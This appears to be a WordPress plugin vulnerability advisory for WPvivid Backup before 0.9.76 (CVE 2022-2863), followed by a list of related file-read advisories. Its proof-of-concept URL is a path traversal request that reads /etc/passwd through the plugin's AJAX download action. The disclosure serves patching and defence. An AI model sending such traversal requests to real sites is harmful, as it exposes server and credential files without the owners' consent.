WPvivid Backup < 0.9.76 – Admin+ Arbitrary File Read | CVE 2022-2863 | Plugin Vulnerabilities

Description

The plugin does not sanitise and validate a parameter before using it to read the content of a file, allowing high privilege users to read any file from the web server via a Traversal attack

Proof of Concept

https://example.com/wp-admin/admin-ajax.php?_wpnonce=34decc6d15&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922

Affects Plugins

wpvivid-backuprestore

Fixed in 0.9.76

References

CVE

Classification

Type

TRAVERSAL

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Rodolfo Tavares

Submitter

Rodolfo Tavares

Submitter website

https://www.tempest.com.br

Submitter twitter

Verified

Yes

WPVDB ID

cb6a3304-2166-47a0-a011-4dcacaa133e5

Timeline

Publicly Published

2022-08-22 (about 1 years ago)

Added

2022-08-22 (about 1 years ago)

Last Updated

2023-05-11 (about 1 years ago)

Other

Published

Title

Published

2023-01-23

Title

Customer Reviews for WooCommerce < 5.16.0 - Contributor+ LFI

Published

2022-08-22

Title

Ajax Load More < 5.5.4 - Admin+ Arbitrary File Read

Published

2019-03-07

Title

Caldera Forms Pro < 1.8.2 - Unauthenticated Arbitrary File Read

Published

2022-07-27

Title

WordPress Team Members Showcase < 4.1.2 - Subscriber+ Arbitrary File Read and Deletion

Published

2017-02-15

Title

Posts In Page < 1.3.0 - Directory Traversal